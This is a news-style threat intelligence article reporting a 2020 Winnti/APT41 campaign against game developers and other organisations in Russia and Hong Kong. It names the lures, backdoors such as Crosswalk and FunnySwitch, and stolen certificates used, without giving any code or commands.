Recent revelations by cybersecurity experts have uncovered a series of sophisticated cyberattacks orchestrated by a Chinese threat actor, targeting various organizations in Russia and Hong Kong. This campaign has been noted for the deployment of an undocumented backdoor, showcasing the evolving nature of threats in today’s digital landscape.
Researchers from Positive Technologies attribute these attacks to a group recognized as Winnti, commonly referred to as APT41. The initial attack is traced back to May 12, 2020, involving the use of LNK shortcuts designed to extract and execute a malicious payload. A follow-up attack on May 30 additionally utilized a malicious RAR file, which contained links disguised as PDF documents, purportedly offering a resume and an IELTS score report.
The LNK shortcuts in this campaign were strategically linked to pages on Zeplin, a legitimate collaboration platform used by developers. Upon accessing these pages, the final-stage malware—comprising a shellcode loader dubbed “svchast.exe”—was deployed alongside a backdoor named Crosswalk (“3t54dE3r.tmp”).
FireEye first documented Crosswalk in 2017 as a stripped-down modular backdoor designed for system reconnaissance and capable of downloading additional modules as needed from an attacker-controlled server. This flexibility in operations raises significant concerns for affected organizations.
The operational methods of this group bear resemblances to those of another notorious actor, Higaisa, known for exploiting LNK files in 2020 to compromise victims via email. However, the utilization of Crosswalk firmly links these attacks to Winnti, especially given the overlap of infrastructure observed in the attack samples, with connections to prior Winnti operations, particularly those targeting the online gaming sector.
Targets, including Battlestate Games, a game development company based in St. Petersburg, underscore the ongoing risk to software studios—a subset often less vigilant regarding cybersecurity protocols. Moreover, researchers discovered additional attack samples comprising RAR files loaded with Cobalt Strike Beacon payloads, one of which referenced U.S. protests as a social engineering lure to entice victims.
In a separate incident, compromised certificates from the Taiwanese organization Zealot Digital facilitated attacks on Hong Kong entities using Crosswalk, along with Metasploit injectors and additional malware types like ShadowPad, Paranoid PlugX, and a new .NET backdoor referred to as FunnySwitch.
The backdoor, reportedly still under development, exhibits functionalities enabling it to gather system data and execute arbitrary JScript. Its similarities to Crosswalk suggest a potential connection between development teams behind these malware variants. This insight reinforces earlier findings that linked Paranoid PlugX to assaults on the gaming industry in 2017, enhancing the narrative of collaboration between these malicious actors.
Researchers emphasize that Winnti’s campaign remains a persistent threat to game developers and publishers across Russia and beyond. These entities, often less equipped in cybersecurity measures, pose advantageous targets for cybercriminals. The risks associated with breaches in software development are profound, as past incidents involving CCleaner and ASUS illustrate. With such ongoing threats, vigilance in cybersecurity remains paramount for businesses in the industry.
